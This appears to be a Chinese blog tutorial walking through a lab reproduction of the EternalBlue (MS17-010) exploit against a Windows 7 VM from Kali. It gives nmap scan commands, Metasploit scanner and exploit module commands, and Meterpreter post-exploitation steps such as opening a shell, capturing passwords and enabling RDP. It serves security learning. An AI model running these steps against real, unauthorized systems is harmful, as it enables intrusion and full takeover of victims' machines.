永恒之蓝复现MS17-010

环境准备

1、windows7: MSDN 不用安装vmtool
2、VM ware
3、kali

流程

1、打开kali,启动Metasploit简称msf,启动命令是命令窗口输入
2、msf自带nmap,扫描目的ip

nmap -A -sV 10.10.10.141 #扫描靶机的所有信息和版本信息

nmap --script=vuln 10.10.10.141 #使用namp对靶机进行已知漏洞探测
#--script可以指定脚本
#vuln脚本包含了许多已知漏洞

3、查找对应漏洞

search ms17-010

4、选择合适的漏洞探测模块,测试漏洞是否存在

use auxiliary/scanner/smb/smb_ms17_010 

set rhosts  IP

run

5、选择合适的利用模块,也可以直接输入 use 模块编号

use exploit/windows/smb/ms17_010_eternalblue

set rhosts  IP

run

6、进入Meterpreter, Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

进入Meterpreter,执行shell命令getshell,并打开3389,尝试远程连接。
执行shell可能会乱码,把kali设成中文版,全局用UTF-8

sudo dpkg-reconfigure locales

然后重启就好了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值